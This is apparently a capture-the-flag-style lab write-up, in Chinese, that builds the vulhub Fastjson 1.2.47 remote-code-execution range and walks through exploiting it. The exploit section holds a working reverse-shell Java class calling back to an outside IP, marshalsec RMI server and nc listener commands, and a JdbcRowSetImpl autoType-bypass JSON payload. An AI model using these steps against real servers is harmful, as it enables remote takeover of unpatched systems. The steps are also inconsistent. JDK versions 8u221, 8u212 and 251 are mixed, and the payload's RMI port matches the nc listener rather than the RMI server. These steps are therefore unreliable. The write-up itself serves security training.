前言
靶场使用的是docker + vulhub,由于kali自带是jdk版本为11,而本次环境需要使用jdk8版本,且版本不能低于8u121。在使用mvn clean package -DskipTests命令的时候,需要使用maven,kali中没有maven,需要手动安装。
环境搭建
安装java环境
下载地址:https://github.com/frekele/oracle-java/releases,下载jdk-8u221-linux-x64.tar.gz
1.卸载kali自带的java环境,重新安装java8
# 查看安装的OpenJDK包
dpkg --list | grep -i jdk
# 卸载OpenJDK相关包
apt-get purge openjdk-*
# 检查所有 OpenJDK包是否都已卸载完毕
dpkg --list | grep -i jdk
2.安装
# 将压缩包放到/opt/java目录下
mv jdk-8u212-linux-x64.tar.gz /opt/java
# 解压
tar -zxvf jdk--8u212-linux-x64.tar.gz
# 配置环境变量
修改/etc/profile文件
vim /etc/profile
export JAVA_HOME=/opt/java/jdk1.8.0_212
export JRE_HOME=${JAVA_HOME}/jre
export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib
export PATH=${JAVA_HOME}/bin:${PATH}
#通知系统java的位置
sudo update-alternatives --install "/usr/bin/java" "java" "/opt/java/jdk1.8.0_251/bin/java" 1
sudo update-alternatives --install "/usr/bin/javac" "javac" "/opt/java/jdk1.8.0_251/bin/javac" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/opt/java/jdk1.8.0_251/bin/javaws" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/opt/java/jdk1.8.0_251/bin/javaws" 1
#设置默认JDK
sudo update-alternatives --set java /opt/java/jdk1.8.0_251/bin/java
sudo update-alternatives --set javac /opt/java/jdk1.8.0_251/bin/javac
sudo update-alternatives --set javaws /opt/java/jdk1.8.0_251/bin/javaws
# 使java环境生效
source /etc/profile
# 查看是否安装成功
java -version
安装maven
#下载maven安装包
wget http://mirrors.cnnic.cn/apache/maven/maven-3/3.5.4/binaries/apache-maven-3.5.4-bin.tar.gz
#解压
tar -zxvf apache-maven-3.5.4-bin.tar.gz
#配置maven mvn,后面的路径为apache-maven-3.5.4所在目录
update-alternatives --install /usr/bin/mvn mvn /var/local/fastjion/apache-maven-3.5.4/bin/mvn 1
#配置mvn环境变量
vim /etc/profile
#添加内容
export MAVEN_HOME=/var/local/fastjion/apache-maven-3.5.4(apache-maven-3.5.4所在的目录)
export PATH=$MAVEN_HOME/bin:$PATH
#刷新配置文件
source /etc/profile
#查看maven版本
mvn -version
编译marshalsec
#下载
git clone https://github.com/mbechler/marshalsec
#进入marshalsec目录
cd marshalsec
#编译(时间较长,耐心等待编译完成)
mvn clean package -DskipTests
启动靶场
#进入靶机所在目录
cd root/vulhub-master/fastjson/1.2.47-rce(本机所在的目录)
#启动靶场
docker-compose up -d
#查看是否搭建成功
http://you-ip:8090/
漏洞利用
#创建TouchFile.java文件,代码如下
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.117/1888 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
#编译TouchFile.java
javac TouchFile.java
#在TouchFile.java所在目录,使用python搭建web服务,使用下面俩个哪个都行,此处使用python2
# python2
python -m SimpleHTTPServer 8086(8086为web服务端口)
# python3
python3 -m http.server
#进入到marshalsec/target目录
cd /var/local/fastjion/marshalsec/target
#开启启RMI服务监听9999端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.117:8086/#TouchFile" 9999
#nc监听
nc -lnvp 1888
#Payload
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.1.117:1888/TouchFile",
"autoCommit":true
}
}
使用 BurpSuite 抓取页面请求数据包,向 Fastjson 靶场服务器发送Payload,如下图所示:
反弹shell